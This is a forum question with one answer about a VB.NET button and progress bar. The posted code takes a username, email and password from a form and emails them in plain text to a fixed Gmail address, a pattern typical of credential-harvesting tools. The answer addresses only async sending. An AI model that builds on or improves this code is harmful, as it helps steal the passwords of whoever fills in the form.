# Visual Basic button and progress bar suggestions

Tags: vb.net

I'm making a program in Visual Basic where I need a button to activate a progress bar and when the progress bar is done display a message.

One problem, I already have code in my button so when the button is clicked the progress bar stops a little after going.

I also have a problem when the progress bar is done I have a message display, well when it displays the message is spammed in till the program crashes.

If I could get help with how to do both of these that would be great!

Here is the button code

```
If TextBox1.Text = "" Then
    MsgBox("Username Is Missing")
    Exit Sub
Else
End If
If TextBox2.Text = "" Then
    MsgBox("Email Is Mising")
    Exit Sub
Else
End If
If TextBox3.Text = "" Then
    MsgBox("Password Is Mising")
    Exit Sub
Else
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("email", "email pw)
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("email")
mail.To.Add("email")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Email: " & TextBox2.Text & ", " & "Passoword: " & TextBox3.Text
smtpServer.Send(mail)
```

I don't have the progress bar code because I'm going to restart on it.

Comment: Please provide the code that is causing the issues.

Comment: I updated the question with the code.

Answer (score 0):

Basically what you need is to show the progress bar on button click and hide it one the email is sent.

So the easiest way to do this is to use the `SmtpClient SendAsync` method, instead of `Send` (which block the GUI / nothing is responding until the email send is completed). `SendAsync` has the callback method `SendCompleted`, which you can attached to for hiding the progress bar and showing the message box.

See this MSDN documentation for SendAsync http://msdn.microsoft.com/en-us/library/system.net.mail.smtpclient.sendcompleted(v=vs.110).aspx?cs-save-lang=1&cs-lang=vb#code-snippet-2